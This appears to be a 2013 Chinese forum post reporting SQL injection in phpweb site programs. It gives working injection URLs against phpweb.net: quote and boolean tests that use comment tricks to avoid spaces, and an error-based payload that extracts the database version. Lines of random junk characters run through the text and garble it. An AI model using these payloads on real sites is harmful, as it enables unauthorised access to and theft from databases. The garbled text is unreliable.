phpweb所有的整站程序伪静态页面都存在sql注入
* y: a+ V n1 \; C5 W8 E/ b9 N2 N. D) @% L% c1 h
主站:http://phpweb.net/
' i! m5 U) }8 O加’检测:
5 @' M" V( H }" ? X * r: c3 |+ E. Y& j: U4 }
http://www.phpweb.net/down/html/?772′.html
7 w3 W; w3 p3 V' y% h5 _
, B( C: T' L; l' k5 `出错
0 a7 ?5 m/ Y" V' m9 e! [存在注入。
' G3 w9 ~) ~8 ~- h/ o) {- y不能用空格,只能用/*罗+ X8 j% M% g* }0 ?: h# |3 c9 K
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
$ G6 T4 r0 @ E l4 v ' D, T/ X6 G; ~0 Y0 b6 [0 g: f
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
5 E5 [2 w8 j1 z: ]2 d爆数据库版本:
4 F, i1 B7 Q$ A! }! e- u 7 h+ `5 E# }: I9 V q
?* w. w+ I8 q/ R; Q& P" p
1. ~$ a' r& d0 H5 p0 q% ^
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html3 N/ P* E( ]. R
更新日期: 2013-01-03 13:39:50 9 }: Q% n. ^! Z! y# p! A% T
|
发表于 2013-1-4 19:46:42
收藏
支持
反对